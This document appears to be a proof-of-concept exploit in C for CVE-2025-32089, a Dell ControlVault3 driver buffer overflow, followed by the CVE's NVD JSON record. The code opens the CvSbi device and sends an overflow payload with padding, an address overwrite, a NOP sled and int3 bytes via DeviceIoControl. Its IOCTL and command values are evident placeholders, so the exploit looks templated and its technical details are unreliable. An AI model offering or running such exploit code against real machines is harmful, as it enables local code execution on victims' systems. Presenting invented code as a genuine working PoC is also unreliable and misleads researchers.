CVE-2025-32089

// CVE-2025-32089 PoC - Dell ControlVault3 Buffer Overflow // This PoC demonstrates sending a malformed API call to trigger buffer overflow // NOTE: This is for educational and authorized testing purposes only #include <windows.h> #include <stdio.h> // ControlVault API definitions #define CONTROLVAULT_API_CALL 0x1234 #define CV_SBI_COMMAND 0x5678 typedef struct { DWORD command; DWORD paramSize; LPVOID paramBuffer; } CV_SBI_REQUEST; // Malformed payload that triggers overflow unsigned char malicious_payload[] = { 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, // padding 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x42, 0x42, 0x42, 0x42, // overwrite address 0x43, 0x43, 0x43, 0x43, 0x44, 0x44, 0x44, 0x44, 0x45, 0x45, 0x45, 0x45, 0x90, 0x90, 0x90, 0x90, // NOP sled 0xCC, 0xCC, 0xCC, 0xCC // int3 for debugging }; int trigger_vulnerability() { HANDLE hDevice; DWORD bytesReturned; CV_SBI_REQUEST request; // Open handle to ControlVault driver hDevice = CreateFile( "\\\\.\\CvSbi", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL ); if (hDevice == INVALID_HANDLE_VALUE) { printf("[-] Failed to open ControlVault device\n"); return -1; } printf("[+] Connected to ControlVault device\n"); // Prepare malicious request request.command = CV_SBI_COMMAND; request.paramSize = sizeof(malicious_payload); request.paramBuffer = malicious_payload; printf("[*] Sending malformed API call (size: %d bytes)...\n", request.paramSize); // Send malicious request - this triggers buffer overflow BOOL result = DeviceIoControl( hDevice, CONTROLVAULT_API_CALL, &request, sizeof(request), NULL, 0, &bytesReturned, NULL ); if (!result) { printf("[!] DeviceIoControl failed - vulnerability may be triggered\n"); } CloseHandle(hDevice); return 0; } int main() { printf("CVE-2025-32089 PoC - Dell ControlVault3 Buffer Overflow\n"); printf("Target: Dell ControlVault3 < 5.15.14.19\n"); printf("CVSS: 8.8 (High)\n\n"); trigger_vulnerability(); return 0; }

{"cve": {"id": "CVE-2025-32089", "sourceIdentifier": "[email protected]", "published": "2025-11-17T23:15:51.943", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A buffer overflow vulnerability exists in the CvManager_SBI functionality of Dell ControlVault3 prior to 5.15.14.19 and Dell ControlVault3 Plus prior to 6.2.36.47. A specially crafted ControlVault API call can lead to a arbitrary code execution. An attacker can issue an api call to trigger this vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.0, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-120"}]}], "references": [{"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2025-2188", "source": "[email protected]"}, {"url": "https://www.dell.com/support/kbdoc/en-us/000326061/dsa-2025-228", "source": "[email protected]"}, {"url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2025-2188", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}